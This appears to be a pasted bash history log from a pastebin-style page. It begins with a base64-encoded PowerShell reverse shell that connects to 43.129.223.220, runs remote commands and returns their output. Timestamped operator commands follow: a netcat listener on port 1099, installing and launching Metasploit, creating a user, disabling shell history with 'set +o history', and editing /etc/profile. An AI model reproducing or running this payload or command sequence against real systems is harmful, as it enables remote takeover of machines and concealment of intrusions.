JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANAAzAC4AMQAyADkALgAyADIAMwAuADIAMgAwACIALAA0ADQANQAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" -A "43.129.223.220"
  1726. #1639249183
  1727. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1728. #1639258969
  1729. nc -lvp 1099
  1730. #1639261936
  1731. msfconsole
  1732. #1639261940
  1733. ls
  1734. #1639261930
  1735. screen
  1736. #1639258948
  1737. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1738. #1639315761
  1739. ls
  1740. #1639315766
  1741. msfinstall
  1742. #1639315768
  1743. ll
  1744. #1639315780
  1745. ./msfinstall
  1746. #1639316050
  1747. msf
  1748. #1639316053
  1749. msfconsole
  1750. #1639316085
  1751. ./msfconsole
  1752. #1639316121
  1753. ll
  1754. #1639316134
  1755. cd /opt/metasploit-framework/bin
  1756. #1639316136
  1757. ls
  1758. #1639316140
  1759. cd msfconsole
  1760. #1639316150
  1761. adduser msf
  1762. #1639316155
  1763. su msf
  1764. #1639318475
  1765. exit
  1766. #1639315761
  1767. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1768. #1639318479
  1769. exit
  1770. #1639318478
  1771. export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
  1772. #1639318505
  1773. set +o history;
  1774. #1639318539
  1775. su msf
  1776. #1639349991
  1777. ls
  1778. #1639349997
  1779. msfconsole
  1780. #1639350019
  1781. vi /etc/profile
  1782. #1639350058
  1783. source /etc/profile
  1784.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement